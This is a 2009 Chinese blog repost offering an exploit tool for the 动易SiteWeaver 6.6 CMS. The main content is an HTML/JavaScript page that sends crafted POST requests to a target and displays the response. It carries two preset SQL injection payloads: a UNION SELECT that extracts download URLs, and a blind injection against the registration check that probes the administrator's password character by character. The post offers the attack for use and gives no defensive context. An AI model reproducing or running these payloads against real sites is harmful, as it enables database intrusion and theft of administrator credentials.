夜火博客

动易SiteWeaver 6.6版最新漏洞利用工具

2009-02-22
漏洞信息
动易
漏洞信息
exploit
2分钟
213字

动易SiteWeaver 6.6版最新漏洞利用工具,直接贴代码:

1
<script>
2
function gb2utf8(data){
3
var glbEncode = [];
4
gb2utf8_data = data;
5
execScript(“gb2utf8_data = MidB(gb2utf8_data, 1)”, “VBScript”);
6
var t=escape(gb2utf8_data).replace(/%u/g,“”).replace(/(.{2})(.{2})/g,“%$2%$1″).replace(/%([A-Z].)%(.{2})/g,“@$1$2″);
7
t=t.split(“@”);
8
var i=0,j=t.length,k;
9
while(++i<j) {
10
k=t[i].substring(0,4);
11
if(!glbEncode[k]) {
12
gb2utf8_char = eval(“0x”+k);
13
execScript(“gb2utf8_char = Chr(gb2utf8_char)”, “VBScript”);
14
glbEncode[k]=escape(gb2utf8_char).substring(1,6);
15
}
45 collapsed lines
16
t[i]=glbEncode[k]+t[i].substring(4);
17
}
18
gb2utf8_data = gb2utf8_char = null;
19
return unescape(t.join(“%”));
20
}
21


22
function PostData(){
23
var url = document.getElementById(“url”).value;
24
var post= document.getElementById(“post”).value;
25
var oXmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
26
oXmlHttp.open(“POST”, url, false);
27
if (url.indexOf(“User_CheckReg.asp”)>0){oXmlHttp.setRequestHeader(“Content-Type”,“application/x-www-form-urlencoded”);}
28
oXmlHttp.send(post);
29
var GetResult=gb2utf8(oXmlHttp.responseBody);
30
if (oXmlHttp.readyState == 4) {
31
if (oXmlHttp.status == 200) {
32
document.getElementById(“getResult”).value = GetResult;
33
}
34
}
35
}
36
function Inject(i){
37
if (i==1){
38
document.getElementById(“url”).value=http://127.0.0.1:81/pe2006/Dyna_Page.asp”;
39
document.getElementById(“post”).value=<?xml version=1.0″ encoding=”gb2312″?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>’;
40
}
41
else
42
{
43
document.getElementById(“url”).value=“http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp”;
44
document.getElementById(“post”).value=“UserName=admino’%20union%20select%201%20from%20pe_admin%20where%20username=’admin’band%20Mid(password,1,1)>0″;
45
}
46
}
47


48
</script>
49
<BODY>
50
<div align=“center”>[动易SiteWeaver6.6版最新漏洞利用工具](/blog/siteweaver-66-exploit)</div>
51
请输入URL:<br>
52
<INPUT TYPE=“text” id=“url” value=“http://127.0.0.1:81/pe2006/Dyna_Page.asp” style=“width:90%;”>&nbsp;&nbsp;&nbsp;<br>
53
输入Post:<br>
54
<textArea id=“post” style=“width:90%; height:80;”><?xml version=“1.0″ encoding=“gb2312″?>
55
<root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea>
56
<div align=“center”><INPUT TYPE=“button” value=“漏洞一示例” onClick=“Inject(1);”>&nbsp;&nbsp;<INPUT TYPE=“button” value=“    onClick=“PostData();”>&nbsp;&nbsp;<INPUT TYPE=“button” value=“漏洞二示例” onClick=“Inject(2);”></div>
57
<hr size=2 >
58
注入结果:<br>
59
<textArea id=“getResult” style=“width:90%; height:200;”></textArea>
60
</BODY>

作者:Cschii 转自黑客防线

eWebEditor v6.0.0 版本漏洞
Windows Server 2008 R2 Beta VHD镜像文件下载
本文标题:动易SiteWeaver 6.6版最新漏洞利用工具
文章作者:夜火
发布时间:2009-02-22
Copyright 2007-2025
  夜火博客
站点地图
夜火笔记
CloudFlare Batch 批量解析域名